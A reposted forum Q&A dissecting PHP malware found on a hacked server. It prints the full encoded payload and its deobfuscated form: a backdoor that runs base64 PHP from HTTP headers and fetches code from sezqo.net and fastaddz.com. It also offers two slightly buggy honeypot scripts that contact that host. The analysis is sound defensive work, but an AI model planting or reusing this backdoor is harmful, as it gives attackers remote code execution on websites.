eval(gzuncompress(base64_decode("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")));
此preg_replace(...)调用使用模式"/.../e",该模式在字符串Q0QO00QOO中查找字符串Q0QO00QOO,并在每次出现时执行上面的I11lIl1I(507, 2862)(解码后的字符串).该代码包含eval(gzuncompress(base64_decode(" ")));,该代码再次对字符串进行base64解码,然后解压缩二进制数据并对其进行评估(=执行其php代码).
This preg_replace(...) call uses a pattern "/.../e", which looks for the string Q0QO00QOO in the string Q0QO00QOO and executes I11lIl1I(507, 2862) (the decoded string) above for every occurance. The code contains eval(gzuncompress(base64_decode(" "))); which again base64-decodes a string then uncompresses the binary data and evaluates (=executes its php code) it.
未压缩的,经base64解码的文本再次是一些php代码,其名称看起来像这样:
The uncompressed, base64-decoded text is again some php code, which pretified looks like this:
if (!defined("determinator")) {
if (function_exists(I11lIl1I(1, 10))) {
@ini_set(I11lIl1I(14, 20), 1);
@ini_set(I11lIl1I(34, 19), 0);
}
function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
$I1lI1I = microtime(true);
return feof($Q0OOOQ);
}
function w3net_getfile($I1ll11, $I11IIl) {
$IIlI1I = "curl";
$I1IIll = $IIlI1I."_init";
if (@ini_get("allow_url_fopen") == "1") {
return @file_get_contents("http://" . $I1ll11 . $I11IIl. "&w=fgc");
} elseif (function_exists($I1IIll)){
$QO00QO = @$I1IIll();
$QOOOQQ = $IIlI1I."_setopt";
$IIl11I = $IIlI1I."_exec";
@$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl. "&w=cu");
@$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
@$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
@$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
$IIIl1I = @$IIl11I($QO00QO);
@curl_close($QO00QO);
if (empty($IIIl1I)) {
$IIIl1I = "";
}
return $IIIl1I;
} else {
$Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
if ($Q0OOOQ) {
$I111lI = "";
$I1lI1I = NULL;
@fputs($Q0OOOQ, "GET {$I11IIl}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$I1ll11}\r\n");
$QOOOQO = PHP_OS."/".PHP_VERSION;
@fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
while(!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
$I111lI .= @fgets($Q0OOOQ, 128);
}
@fclose($Q0OOOQ);
$Q000OQ = explode("\r\n\r\n", $I111lI);
unset($Q000OQ[0]);
return implode("\r\n\r\n", $Q000OQ);
}
}
}
function w3net_output($I1I1lI, $I1lIll) {
echo "Y_".$I1I1lI.":".$I1lIll."\r\n";
}
function php_server($Q0000Q){
return @$_SERVER[$Q0000Q];
}
$IlI11l=I11lIl1I(55, 14);
$I1lll1=I11lIl1I(69, 6);
$Q0Q0QO=I11lIl1I(78, 23);
$I1ll11=I11lIl1I(102, 10);
if (isset($_SERVER[I11lIl1I(114, 7)])) {
if (@$_SERVER[I11lIl1I(114, 7)] != I11lIl1I(122, 4)) { $I1ll11=I11lIl1I(130, 11); }
}
$I1ll11.=strtolower(@$_SERVER[I11lIl1I(142, 12)]);
foreach ($_GET as $I1I1lI=>$I1lIll) {
if (strpos($I1lIll,I11lIl1I(157, 7))) {
$_GET[$I1I1lI]=I11lIl1I(167, 0);
} elseif (strpos($I1lIll,I11lIl1I(167, 8))) {
$_GET[$I1I1lI]=I11lIl1I(167, 0);
}
}
if(!isset($_SERVER[I11lIl1I(175, 15)])) {
$_SERVER[I11lIl1I(175, 15)] = @$_SERVER[I11lIl1I(190, 15)];
if(isset($_SERVER[I11lIl1I(211, 16)])) {
$_SERVER[I11lIl1I(175, 15)] .= I11lIl1I(231, 2) . @$_SERVER[I11lIl1I(211, 16)];
}
}
function get_temp_directory() {
$I11III=dirname(__FILE__).DIRECTORY_SEPARATOR;
$Q0Q00Q = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III."tmp", $I11III."wp-content/uploads", $I11III."wp-content/cache", );
foreach ($Q0Q00Q as $Q0QOOO){
if (!empty($Q0QOOO)){
$Q0QOOO.=DIRECTORY_SEPARATOR;
if (@is_writable($Q0QOOO)) {
$I11III = $Q0QOOO; break;
}
}
}
return $I11III;
}
if (strlen($I1ll11) < 10) {
define(I11lIl1I(235, 16), 0);
} elseif ($Q0OO0O=$I1ll11.@$_SERVER[I11lIl1I(175, 15)]) {
$QO0O0Q=@md5($I1ll11.PHP_OS.$I1lll1.$Q0Q0QO);
$w3n_code=get_temp_directory().I11lIl1I(253, 2).$QO0O0Q;
define(I11lIl1I(235, 16), $w3n_code);
$IlIlII = $w3n_code.I11lIl1I(257, 6);
if (@$_SERVER[I11lIl1I(267, 15)]==$QO0O0Q) {
$QO0QQ0=I11lIl1I(282, 18);
echo "\r\n";
w3net_output(I11lIl1I(301, 8), $I1lll1.I11lIl1I(310, 2).$IlI11l.I11lIl1I(314, 6));
if ($Q00OQO=$QO0QQ0(@$_SERVER[I11lIl1I(321, 16)])){
@eval($Q00OQO);
echo "\r\n";
w3net_output(I11lIl1I(338, 4), I11lIl1I(342, 3));
}
exit(0);
}
$II11l1 = False;
$Il11I1 = @strtolower(@$_SERVER[I11lIl1I(346, 20)]);
foreach (explode(I11lIl1I(366, 2), I11lIl1I(371, 54)) as $QOOQOO) {
if (strpos($Il11I1, $QOOQOO)!==False) {
$Il1Il1 = @fopen($w3n_code.I11lIl1I(257, 6), I11lIl1I(430, 2));
$Ill11I = @urlencode(@$_SERVER[I11lIl1I(175, 15)]);
@fwrite($Il1Il1, time()."\t".$QOOQOO."\t".$Ill11I."\n");
@fclose($Il1Il1);
$II11l1=True;
break;
}
}
if (@is_file($w3n_code)) {
@touch($w3n_code);
@include_once($w3n_code);
} elseif ($II11l1 === True) {
$I1Il1I = Array(I11lIl1I(435, 12), I11lIl1I(449, 16));
if (@touch($w3n_code)) {
$Q0OO0O=@urlencode($Q0OO0O);
$I11IIl = I11lIl1I(465, 14).$Q0OO0O.I11lIl1I(482, 4).$QO0O0Q.I11lIl1I(487, 12).$IlI11l.I11lIl1I(503, 4).$I1lll1;
$QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
@touch($w3n_code);
}
}
} else {
define(I11lIl1I(235, 16), 1);
}
}
如我们所见,
它使用I11lIl1I(..)函数再次混淆了一些字符串和函数名称.让我们替换这些:
As we can see, it obfuscates some strings and function names again using the I11lIl1I(..)-function. Let us replace these ones:
if (!defined("determinator")) {
if (function_exists("ini_set")) {
@ini_set("allow_url_fopen", 1);
@ini_set("display_errors", 0);
}
function w3net_feof($Q0OOOQ, &$I1lI1I = NULL) {
$I1lI1I = microtime(true);
return feof($Q0OOOQ);
}
function w3net_getfile($I1ll11, $I11IIl) {
$IIlI1I = "curl";
$I1IIll = $IIlI1I."_init";
if (@ini_get("allow_url_fopen") == "1") {
return @file_get_contents("http://" . $I1ll11 . $I11IIl. "&w=fgc");
} elseif (function_exists($I1IIll)){
$QO00QO = @$I1IIll();
$QOOOQQ = $IIlI1I."_setopt";
$IIl11I = $IIlI1I."_exec";
@$QOOOQQ($QO00QO, CURLOPT_URL, "http://" . $I1ll11 . $I11IIl. "&w=cu");
@$QOOOQQ($QO00QO, CURLOPT_HEADER, false);
@$QOOOQQ($QO00QO, CURLOPT_RETURNTRANSFER, true);
@$QOOOQQ($QO00QO, CURLOPT_CONNECTTIMEOUT, 6);
$IIIl1I = @$IIl11I($QO00QO);
@curl_close($QO00QO);
if (empty($IIIl1I)) {
$IIIl1I = "";
}
return $IIIl1I;
} else {
$Q0OOOQ = @fsockopen($I1ll11, 80, $Il111l, $Q000O0, 5);
if ($Q0OOOQ) {
$I111lI = "";
$I1lI1I = NULL;
@fputs($Q0OOOQ, "GET {$I11IIl}"."&w=sk HTTP/1.0"."\r\n"."Host: "."{$I1ll11}\r\n");
$QOOOQO = PHP_OS."/".PHP_VERSION;
@fputs($Q0OOOQ, "User-Agent: {$QOOOQO}\r\n\r\n");
while(!w3net_feof($Q0OOOQ, $I1lI1I) && (microtime(true) - $I1lI1I) < 2) {
$I111lI .= @fgets($Q0OOOQ, 128);
}
@fclose($Q0OOOQ);
$Q000OQ = explode("\r\n\r\n", $I111lI);
unset($Q000OQ[0]);
return implode("\r\n\r\n", $Q000OQ);
}
}
}
function w3net_output($I1I1lI, $I1lIll) {
echo "Y_".$I1I1lI.":".$I1lIll."\r\n";
}
function php_server($Q0000Q){
return @$_SERVER[$Q0000Q];
}
$IlI11l="ftp/201309";
$I1lll1="3.01";
$Q0Q0QO="QQ0OQ000000Q0OQ0Q";
$I1ll11="http://";
if (isset($_SERVER["HTTPS"])) {
if (@$_SERVER["HTTPS"] != "off") { $I1ll11="https://"; }
}
$I1ll11.=strtolower(@$_SERVER["HTTP_HOST"]);
foreach ($_GET as $I1I1lI=>$I1lIll) {
if (strpos($I1lIll,"union")) {
$_GET[$I1I1lI]="";
} elseif (strpos($I1lIll,"select")) {
$_GET[$I1I1lI]="";
}
}
if(!isset($_SERVER["REQUEST_URI"])) {
$_SERVER["REQUEST_URI"] = @$_SERVER["SCRIPT_NAME"];
if(isset($_SERVER["QUERY_STRING"])) {
$_SERVER["REQUEST_URI"] .= "?" . @$_SERVER["QUERY_STRING"];
}
}
function get_temp_directory() {
$I11III=dirname(__FILE__).DIRECTORY_SEPARATOR;
$Q0Q00Q = Array( "/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $I11III."tmp", $I11III."wp-content/uploads", $I11III."wp-content/cache", );
foreach ($Q0Q00Q as $Q0QOOO){
if (!empty($Q0QOOO)){
$Q0QOOO.=DIRECTORY_SEPARATOR;
if (@is_writable($Q0QOOO)) {
$I11III = $Q0QOOO; break;
}
}
}
return $I11III;
}
if (strlen($I1ll11) < 10) {
define("determinator", 0);
} elseif ($Q0OO0O=$I1ll11.@$_SERVER["REQUEST_URI"]) {
$QO0O0Q=@md5($I1ll11.PHP_OS.$I1lll1.$Q0Q0QO);
$w3n_code=get_temp_directory().".".$QO0O0Q;
define("determinator", $w3n_code);
$IlIlII = $w3n_code.".log";
if (@$_SERVER["HTTP_Y_AUTH"]==$QO0O0Q) {
$QO0QQ0="base64_decode";
echo "\r\n";
w3net_output("versio", $I1lll1."-".$IlI11l."-php");
if ($Q00OQO=$QO0QQ0(@$_SERVER["HTTP_EXECPHP"])){
@eval($Q00OQO);
echo "\r\n";
w3net_output("out", "ok");
}
exit(0);
}
$II11l1 = False;
$Il11I1 = @strtolower(@$_SERVER["HTTP_USER_AGENT"]);
foreach (explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex") as $QOOQOO) {
if (strpos($Il11I1, $QOOQOO)!==False) {
$Il1Il1 = @fopen($w3n_code.".log", "a");
$Ill11I = @urlencode(@$_SERVER["REQUEST_URI"]);
@fwrite($Il1Il1, time()."\t".$QOOQOO."\t".$Ill11I."\n");
@fclose($Il1Il1);
$II11l1=True;
break;
}
}
if (@is_file($w3n_code)) {
@touch($w3n_code);
@include_once($w3n_code);
} elseif ($II11l1 === True) {
$I1Il1I = Array("sezqo.net", "fastaddz.com");
if (@touch($w3n_code)) {
$Q0OO0O=@urlencode($Q0OO0O);
$I11IIl = "/w3.php?u=".$Q0OO0O."&k=".$QO0O0Q."&t=php&p=".$IlI11l."&v=".$I1lll1;
$QOQOQO = w3net_getfile($I1Il1I[0], $I11IIl);
@touch($w3n_code);
}
}
} else {
define("determinator", 1);
}
}
再次使用一些字符串代替函数名称等.我替换了这些字符串以使代码再次可读.结果:在解码和清理脚本"部分中找到了脚本.
Again some string used instead function names etc. I replaced those to make the code readable again. Result: script found in section "The Decoded and Cleaned Up Script".
以下脚本实现了特洛伊木马协议,但不是执行代码,而是将其记录到文件中.更好地更改$hash(例如,使用 http://www.md5.cz/生成有效的md5哈希值)-值必须在两个脚本中都相等!
The following script implement the trojans protocol, but instead of executing the code it shall log it to a file. Better change the $hash (e.g. use http://www.md5.cz/ to generate a valid md5 hash) - value must be equal in both scripts!
将两个脚本存储在可从Internet访问的位置.将$ fn ="evilphpcode-".$ N.txt;更改为脚本可以创建文件的路径!从浏览器调用该脚本,它应该显示" Hi there ;-).将第二个脚本的$ url设置为此网址.它将伪造的请求发送到网络".从浏览器调用它,然后看到确定,请求已发送!".现在,脚本会将传入的执行请求"记录到文件中,这可能需要一段时间.然后让我们知道里面有什么!
Store both script in a location accessible from internet. Change $fn = "evilphpcode-".$N.txt"; to a path where a script may create files! Call the script from the browser, it should say "Hi there ;-)". Set $url of second script to this URL. It will send a fake request to the "network". Call it from the browser and see "OK, request sent!". Now the script will log incoming 'execution requests' to files. This might take a while... then let us know what was in there!
第一个脚本(记录):
<?php
$hash = "c1a227ac6f77c4ad098144a61dd906a0";
$code = base64_decode(@$_SERVER["HTTP_EXECPHP"]);
$auth = $_SERVER["HTTP_Y_AUTH"];
function store() {
global $code, $auth;
for($N=1; file_exists($fn);++$N) { $fn = "evilphpcode-".$N.txt"; }
file_put_contents($fn, $code);
file_put_contents($fn."-hash", $auth);
}
if ($auth != $hash) { echo "Hi there ;-)"; store(); exit(0); }
$version1="ftp/201309"; $version2="3.01";
function out($key, $val) { echo "Y_".$key.":".$val."\r\n"; }
out("versio", $version2."-".$version1."-php");
sleep(1); store();
echo "\r\n";
out("out", "ok");
?>
第二个脚本(请求):
<?php
$hash = "c1a227ac6f77c4ad098144a61dd906a0";
$url = "http://mydomain.com/path/toscript/script.php"; // <-- put in first scripts location!!!
$url = urlencode($url);
$urltofetch = "http://sezqo.net/w3.php?u=".$url."&k=".$hash."&t=php&p=".$version1."&v=".$version2;
$data = file_get_contents($urltofetch);
echo "OK, request sent!";
?>
这篇关于我的服务器被黑客入侵,注入了编码代码.我不知道此代码的目的是什么?请任何人帮助我的文章就介绍到这了,希望我们推荐的答案对大家有所帮助,也希望大家多多支持IT屋!
